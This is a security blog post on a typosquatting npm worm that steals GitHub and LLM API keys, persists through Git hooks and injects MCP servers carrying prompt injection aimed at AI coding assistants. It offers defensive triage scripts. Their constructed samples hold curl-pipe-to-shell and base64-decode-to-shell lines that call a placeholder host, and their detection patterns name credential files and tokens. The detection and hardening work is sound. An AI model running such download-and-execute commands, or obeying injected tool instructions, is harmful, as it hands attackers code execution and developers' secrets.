SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains

Khushal

Apr 4, 2024
An active Shai-Hulud-style supply-chain worm campaign is spreading via typosquatting and AI-toolchain poisoning across at least 19 malicious npm packages linked to two npm aliases. The sample retains the Shai-Hulud hallmarks and adds GitHub API exfiltration with a DNS fallback, hook-based persistence, an SSH propagation fallback, MCP server injection carrying embedded prompt injection aimed at AI coding assistants, and LLM API key harvesting.
 
The scenario described (npm typosquatting, "AI toolchain poisoning", and credential/token theft) fits a common supply-chain playbook: gain code execution during install or build, steal developer secrets (GitHub tokens, LLM keys), then use persistence and lateral movement to spread further.

I can’t verify the specific package names or the “at least 19 malicious packages / two npm aliases” claim from here without opening the linked research, so treat the details as “per the Socket post” and confirm against the vendor’s indicators before taking package-specific actions.

Why this is high-impact
  • npm install-time execution: Malicious packages often abuse lifecycle scripts (preinstall/install/postinstall/prepare) to run code on developer machines and CI.
  • Credential harvest: GitHub tokens, SSH keys, and LLM API keys are high-value and can quickly lead to repo compromise, malicious releases, and broader supply-chain spread.
  • Developer-tool persistence: Hook-based persistence (e.g., Git hooks) and “tooling injections” can survive normal dependency cleanup and re-infect projects.
  • AI assistant angle: “Prompt injection” embedded in toolchain artifacts (including MCP server–style integrations) is essentially social engineering aimed at getting the assistant/user to run unsafe commands or disclose secrets.

Immediate defensive steps (safe, low-risk) for devs/teams
  • Freeze and contain: Pause deployments and CI releases for affected repos until dependencies are validated.
  • Identify exposure: Review recent dependency changes (package.json + lockfile diffs) and look for new/odd packages, especially close-miss names (typosquats).
  • Reinstall safely for triage: test installs in an isolated container/VM with lifecycle scripts disabled, so nothing in the package runs at install time:
    • npm: run npm ci --ignore-scripts (or set ignore-scripts=true in npm config for the investigation session). Caveat: this also skips legitimate build steps such as native-addon compilation, and it does not stop code that executes when the package is later required or imported, so still do the install in a disposable environment.
  • Hunt for persistence: Check for unexpected Git hooks in .git/hooks, unusual shell profile additions, and suspicious startup entries on dev workstations/CI images.
  • Rotate secrets as if stolen: GitHub tokens, SSH keys, npm tokens, CI secrets, and any LLM/API keys used on the dev machine/CI should be rotated if there’s any chance install-time code ran.
  • Check GitHub access: Review recent authentication events, new deploy keys, new GitHub Apps/OAuth authorizations, added collaborators, and unexpected workflow changes.
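The "identify exposure" step above, as an added example that is not code from the Socket post or the forum author: it diffs two package-lock.json (lockfileVersion 2/3) "packages" maps to list what a dependency update actually pulled in, then flags added names that sit within a small edit distance of well-known packages. The two lockfile fragments and the KNOWN_GOOD list are constructed for illustration and are not campaign indicators.

```javascript
// Added example, not code from the Socket post or the forum author: diff two
// package-lock.json (lockfileVersion 2/3) "packages" maps to list what a
// dependency update actually pulled in, then flag added names that sit within
// a small edit distance of well-known packages. The two lockfile fragments and
// the KNOWN_GOOD list are constructed for illustration, not campaign indicators.

// Levenshtein edit distance (single-row dynamic programming).
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0]; // d[i-1][j-1] for j = 1
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j]; // d[i-1][j]
      row[j] = Math.min(
        above + 1,                              // deletion
        row[j - 1] + 1,                         // insertion
        diag + (a[i - 1] === b[j - 1] ? 0 : 1), // substitution
      );
      diag = above;
    }
  }
  return row[b.length];
}

// "node_modules/foo" or "node_modules/a/node_modules/@scope/b" -> package name.
function packageNameFromPath(lockPath) {
  const marker = 'node_modules/';
  const idx = lockPath.lastIndexOf(marker);
  return idx === -1 ? null : lockPath.slice(idx + marker.length);
}

// Packages present in newLock but not oldLock (added) and packages whose resolved
// version changed. Keyed by lockfile path so nested duplicates are kept apart.
function diffLockfiles(oldLock, newLock) {
  const before = new Map(Object.entries(oldLock.packages || {}));
  const added = [];
  const changed = [];
  for (const [path, meta] of Object.entries(newLock.packages || {})) {
    const name = packageNameFromPath(path);
    if (!name) continue; // "" is the root project entry
    const prev = before.get(path);
    if (!prev) added.push({ name, version: meta.version, path });
    else if (prev.version !== meta.version) changed.push({ name, from: prev.version, to: meta.version });
  }
  return { added, changed };
}

// Flag names within maxDistance edits of a known package but not equal to it.
// Very short names are skipped: "ms" vs "mz" is noise, not a typosquat signal.
function findTyposquats(names, knownGood, maxDistance = 2) {
  const suspects = [];
  for (const name of names) {
    if (knownGood.has(name) || name.length < 5) continue;
    for (const good of knownGood) {
      const d = levenshtein(name, good);
      if (d > 0 && d <= maxDistance) suspects.push({ name, lookalike: good, distance: d });
    }
  }
  return suspects;
}

function triage(oldLock, newLock, knownGood) {
  const { added, changed } = diffLockfiles(oldLock, newLock);
  return { added, changed, typosquats: findTyposquats(added.map((a) => a.name), knownGood) };
}

// Constructed sample lockfile fragments: a before/after pair for one dependency bump.
const oldLock = { packages: {
  '': { name: 'demo-app', version: '1.0.0' },
  'node_modules/lodash': { version: '4.17.21' },
  'node_modules/express': { version: '4.19.2' },
} };
const newLock = { packages: {
  '': { name: 'demo-app', version: '1.0.0' },
  'node_modules/lodash': { version: '4.17.21' },
  'node_modules/express': { version: '4.19.2' },
  'node_modules/lodahs': { version: '1.0.3' },   // constructed near-miss of "lodash"
  'node_modules/left-pad': { version: '1.3.0' },
} };
// In practice this is your org's approved list or the top-N registry names.
const KNOWN_GOOD = new Set(['lodash', 'express', 'react', 'axios', 'chalk', 'left-pad']);

console.log(JSON.stringify(triage(oldLock, newLock, KNOWN_GOOD), null, 2));
```

Run it with node against real lockfiles by replacing the two constructed objects with JSON.parse of the before/after files from git; every entry in "added" is a package that needs a reason to exist, and every typosquat hit is worth checking against the vendor's package list before you rotate anything.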

What to look for in npm supply-chain compromises
  • New dependencies that were not intentionally added (including transitive changes that appear after a lockfile update).
  • Lifecycle scripts that fetch/run remote code, decode blobs (base64), or invoke PowerShell/curl/wget/node with inline scripts.
  • Obfuscated JavaScript in package “install” paths, or unusual binaries shipped inside the package tarball.
  • Network indicators during install/build (DNS beacons, GitHub API calls, or outbound traffic to uncommon hosts).
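The install-time heuristics just listed, together with the persistence hunt from the defensive steps (Git hooks, shell profiles), as runnable checks. This is an added example, not code from the Socket post or the forum author; the rule set is applied to a package.json's lifecycle scripts, to Git hook contents and to shell profile lines. All sample inputs are constructed, and the example.invalid host is a placeholder rather than a real indicator.

```javascript
// Added example, not code from the Socket post or the forum author: the
// install-time heuristics listed above as runnable checks. The same rule set is
// applied to a package.json's lifecycle scripts, to Git hook contents and to
// shell profile lines, so one pass covers the install surface and the
// persistence spots mentioned earlier. All sample inputs are constructed; the
// example.invalid host is a placeholder, not a real indicator.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristics, not signatures: expect benign hits (node-gyp builds, vendored
// binaries) and review them rather than auto-blocking on a match.
const RULES = [
  { id: 'remote-fetch',    severity: 'high',   re: /\b(curl|wget|Invoke-WebRequest|iwr|Invoke-Expression|iex)\b/i },
  { id: 'inline-node',     severity: 'high',   re: /\bnode\s+(-e|--eval)\b/ },
  { id: 'shell-pipe',      severity: 'high',   re: /\|\s*(sh|bash|zsh|powershell|pwsh)\b/i },
  { id: 'base64-decode',   severity: 'high',   re: /\b(base64\s+(-d|--decode)|atob\s*\(|from\s*\(\s*[^,]+,\s*['"]base64['"]\s*\))/ },
  { id: 'dynamic-eval',    severity: 'high',   re: /\beval\s*\(|new\s+Function\s*\(/ },
  { id: 'credential-path', severity: 'medium', re: /\.npmrc|\.ssh\/|\.git-credentials|GITHUB_TOKEN|NPM_TOKEN|OPENAI_API_KEY|ANTHROPIC_API_KEY/ },
  { id: 'long-b64-blob',   severity: 'medium', re: /[A-Za-z0-9+\/]{200,}={0,2}/ },
];

// Run every rule over every line of a text and report hits with their source.
function scanText(text, source) {
  const findings = [];
  text.split(/\r?\n/).forEach((line, i) => {
    for (const rule of RULES) {
      if (rule.re.test(line)) {
        findings.push({ source, line: i + 1, rule: rule.id, severity: rule.severity, excerpt: line.trim().slice(0, 100) });
      }
    }
  });
  return findings;
}

// Any lifecycle hook is reported (most packages need none), then its body is scanned.
function auditLifecycleScripts(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!scripts[hook]) continue;
    const source = `${manifest.name}@${manifest.version}:scripts.${hook}`;
    findings.push({ source, line: 1, rule: 'has-lifecycle-hook', severity: 'info', excerpt: scripts[hook].slice(0, 100) });
    findings.push(...scanText(scripts[hook], source));
  }
  return findings;
}

// hookFiles: { filename: contents } as read from .git/hooks. Git's defaults ship
// as *.sample and never run; any other file there is an active hook someone added.
function auditGitHooks(hookFiles) {
  const findings = [];
  for (const [name, body] of Object.entries(hookFiles)) {
    if (name.endsWith('.sample')) continue;
    const source = `.git/hooks/${name}`;
    findings.push({ source, line: 1, rule: 'active-git-hook', severity: 'info', excerpt: body.split('\n')[0].trim().slice(0, 100) });
    findings.push(...scanText(body, source));
  }
  return findings;
}

function auditShellProfile(text, path) {
  return scanText(text, path);
}

// Constructed samples.
const sampleManifest = {
  name: 'example-pkg', version: '0.0.1',
  scripts: {
    postinstall: 'node -e "require(\'child_process\').execSync(\'curl -fsSL http://example.invalid/i | sh\')"',
    test: 'jest',
  },
};
const sampleHooks = {
  'pre-commit.sample': '#!/bin/sh\n# stock sample, never executed\n',
  'post-checkout': '#!/bin/sh\necho aGVsbG8= | base64 -d | sh\n',
};
const sampleProfile = [
  'export PATH="$HOME/bin:$PATH"',
  'alias ll="ls -la"',
  'curl -fsSL https://example.invalid/init.sh | bash',
].join('\n');

function runTriage() {
  return [
    ...auditLifecycleScripts(sampleManifest),
    ...auditGitHooks(sampleHooks),
    ...auditShellProfile(sampleProfile, '~/.zshrc'),
  ];
}

console.table(runTriage());
```

To use it on a real tree, feed auditLifecycleScripts every package.json under node_modules (the tarball contents, not just your direct dependencies), auditGitHooks the directory listing of .git/hooks, and auditShellProfile each of ~/.bashrc, ~/.zshrc and ~/.profile; a single "high" hit in a lifecycle script is enough to treat the install as having run attacker code and move to secret rotation.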

AI toolchain / MCP-style integration hardening
  • Treat all tool output and embedded instructions as untrusted input (even if it “looks like” project documentation).
  • Disable auto-approval for tool actions; require explicit human confirmation before running shell commands or modifying security-sensitive files.
  • Keep secrets out of the assistant’s reachable context: don’t store API keys in plaintext files the assistant can read; prefer secret managers and least-privilege tokens.
  • Restrict egress from CI/build where possible (allowlist endpoints), so exfiltration attempts fail noisily.
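The MCP hardening points above (untrusted tool definitions, no auto-approval, no plaintext secrets in assistant-reachable files) as one configuration audit. This is an added example, not code from the Socket post or the forum author. It assumes the common MCP client config shape { "mcpServers": { name: { command, args, env } } }; the exact file name and any auto-approval key are client-specific, and APPROVED_SERVERS and the sample config are constructed for illustration.

```javascript
// Added example, not code from the Socket post or the forum author: audit an
// MCP client configuration against an allowlist of approved servers, and flag
// plaintext secrets or auto-approval settings in it. Assumes the common config
// shape { "mcpServers": { name: { command, args, env } } }; the exact file name
// and any auto-approval key are client-specific. APPROVED_SERVERS and the sample
// config are constructed for illustration.

// name -> expected launcher. A server not listed here, or launched differently, is unreviewed.
const APPROVED_SERVERS = {
  filesystem: { command: 'npx', args: ['-y', '@modelcontextprotocol/server-filesystem'] },
};

// Token prefixes that should never sit in a config file the assistant can read.
const SECRET_VALUE = /^(ghp_|gho_|github_pat_|sk-|npm_|AKIA)[A-Za-z0-9_\-]{8,}/;

const RISKY_LAUNCH = [
  { id: 'inline-eval',  re: /(^|\s)(-e|--eval|-p)(\s|$)/ },        // node -e / -p payloads
  { id: 'remote-fetch', re: /\b(curl|wget|iwr|iex)\b/i },
  { id: 'unusual-path', re: /(^|\/)(node_modules|tmp|\.cache)\// }, // servers living inside deps or temp dirs
];

function auditMcpConfig(config, approved) {
  const findings = [];
  const servers = (config && config.mcpServers) || {};
  for (const [name, def] of Object.entries(servers)) {
    const launch = [def.command, ...(def.args || [])].join(' ');
    const expected = approved[name];
    if (!expected) {
      findings.push({ server: name, rule: 'unapproved-server', detail: launch });
    } else if (expected.command !== def.command ||
               JSON.stringify(expected.args) !== JSON.stringify(def.args || [])) {
      findings.push({ server: name, rule: 'launch-mismatch', detail: launch });
    }
    for (const r of RISKY_LAUNCH) {
      if (r.re.test(launch)) findings.push({ server: name, rule: r.id, detail: launch });
    }
    for (const [key, value] of Object.entries(def.env || {})) {
      if (typeof value === 'string' && SECRET_VALUE.test(value)) {
        findings.push({ server: name, rule: 'plaintext-secret-in-env', detail: key });
      }
    }
    // Per-server auto-approval lists exist in some clients under varying key
    // names (assumption), so match the key loosely.
    for (const key of Object.keys(def)) {
      if (/auto.?approve|always.?allow/i.test(key) && Array.isArray(def[key]) && def[key].length) {
        findings.push({ server: name, rule: 'auto-approval-enabled', detail: `${key}=${def[key].join(',')}` });
      }
    }
  }
  return findings;
}

// Constructed sample: one approved server plus an entry of the kind an injected
// config might contain (placeholder token values, not real credentials).
const sampleConfig = {
  mcpServers: {
    filesystem: { command: 'npx', args: ['-y', '@modelcontextprotocol/server-filesystem'] },
    'helper-tools': {
      command: 'node',
      args: ['/home/dev/project/node_modules/.cache/mcp/server.js'],
      env: { GITHUB_TOKEN: 'ghp_' + 'x'.repeat(36), OPENAI_API_KEY: 'sk-' + 'y'.repeat(40) },
      autoApprove: ['run_command', 'write_file'],
    },
  },
};

console.table(auditMcpConfig(sampleConfig, APPROVED_SERVERS));
```

The allowlist is the important part: a prompt-injected or worm-written server entry can look perfectly ordinary, so the check is "is this exactly the launcher we reviewed", not "does this look malicious". Run it over every MCP config on the workstation and in any checked-in project settings, and treat a hit on plaintext-secret-in-env as a token to rotate, not just a file to clean.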

If you suspect you installed one of the malicious packages
  • Do not keep “debugging” on your primary workstation.
  • Collect evidence first (package name/version, lockfile, npm logs, CI logs, outbound network logs), then remove/restore from a known-good commit.
  • Assume token theft and rotate/replace secrets; review GitHub/org audit logs and npm publish history for unauthorized activity.
  • If this affects a team/org, escalate internally as an incident (it’s not just “a bad package,” it’s potentially credential compromise).

If you want actionable guidance tailored to your environment, the safest next step is to work from the indicators in the Socket post (package list, versions, IOCs) and cross-check them against your lockfiles and CI logs, then proceed with secret rotation and persistence checks as above.
 
Technical Analysis & Remediation

MITRE ATT&CK Mapping

T1195.001
Supply Chain Compromise: Compromise Software Dependencies and Development Tools
(typosquatted npm packages)

T1059.007
Command and Scripting Interpreter: JavaScript
(npm lifecycle scripts executing at install time)

T1552.001
Unsecured Credentials: Credentials In Files
(LLM API key and token harvesting from local config files)

T1528
Steal Application Access Token
(GitHub and npm token theft)

T1567.001
Exfiltration Over Web Service: Exfiltration to Code Repository
(GitHub API exfiltration)

T1048
Exfiltration Over Alternative Protocol
(DNS fallback channel)

T1546.004
Event Triggered Execution: Unix Shell Configuration Modification
(shell profile additions; Git hook persistence has no dedicated sub-technique and sits under T1546)

T1021.004
Remote Services: SSH
(SSH propagation fallback)

MITRE ATLAS AML.T0051
LLM Prompt Injection
(instructions embedded in injected MCP server definitions, aimed at AI coding assistants)

CVE Profile
None assigned; CISA KEV does not apply.
This attack abuses native npm functionality (install-time lifecycle scripts and registry publishing) rather than exploiting a software vulnerability.

Telemetry

Origin Vector

"at least 19 malicious npm packages" linked to two npm aliases.

Persistence
Modifications to .git/hooks and unusual shell profile additions.

Exfiltration/C2
GitHub API exfiltration with DNS fallback.

Constraint
The exact package names and hashes are absent from the provided source text, so hunting has to rely on generic indicators: base64 decoding and curl/wget/node -e invocations in lifecycle scripts, and unexpected DNS or GitHub API traffic during install.

Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)

GOVERN (GV) – Crisis Management & Oversight

Command
Halt deployments and CI releases for any repository exhibiting unauthorized dependency updates until the package lockfile is validated.

DETECT (DE) – Monitoring & Analysis

Command
Query SIEM for anomalous outbound DNS beacons, GitHub API calls, and child processes spawned by npm install.

Command
Hunt for unauthorized modifications within .git/hooks across all developer workstations.

RESPOND (RS) – Mitigation & Containment

Command
Revoke and rotate all GitHub tokens, SSH keys, npm publish tokens, and LLM API keys present on exposed workstations and CI runners.

Command
Disable auto-approval for AI tool actions to prevent prompt-injected commands from executing silently.

RECOVER (RC) – Restoration & Trust

Command
Roll back package.json and lockfiles to a verified clean commit.

Command
Rebuild CI environments from pristine images.

IDENTIFY & PROTECT (ID/PR) – The Feedback Loop

Command
Use --ignore-scripts for local npm installs during investigations so lifecycle scripts do not execute; note that this also skips legitimate build steps and does not stop code that runs when a package is required, so pair it with a disposable environment.

Command
Store API keys in secure vaults rather than plaintext files accessible to AI coding assistants.

Remediation - THE HOME USER TRACK (Safety Focus)

Environmental Check
Node.js, npm, and AI coding toolchains are not default components of Windows or macOS. If you are not a software developer, this Threat Level is Theoretical/Low.

Priority 1: Safety

Command
If you are a developer and suspect you ran an untrusted npm install, disconnect the machine from the internet immediately to halt DNS/GitHub API exfiltration.

Command
Do not log into banking/email until verified clean.

Priority 2: Identity

Command
Immediately reset your GitHub password and revoke all active Personal Access Tokens (PATs) and SSH keys, using a known clean device.

Priority 3: Persistence

Command
Check your shell profiles (.bashrc, .zshrc) and project .git/hooks for unauthorized scripts.

Hardening & References

Baseline

CIS Software Supply Chain Security Guide; OpenSSF npm Best Practices Guide.

Framework
NIST CSF 2.0 / SP 800-61r3.

Source
Socket.dev Security Blog
 
For the home user, these worms are not armies storming the fortress, but termites working silently beneath the floorboards. One lives in peace, until one day the chair collapses and you discover the wood was hollow. It's not that the monster comes looking for us, it's that it hides inside the apps we use. The best approach is to maintain digital hygiene as if sweeping the yard every morning, because you never know which tiny creature is preparing its conquest. 🪵🐜🧹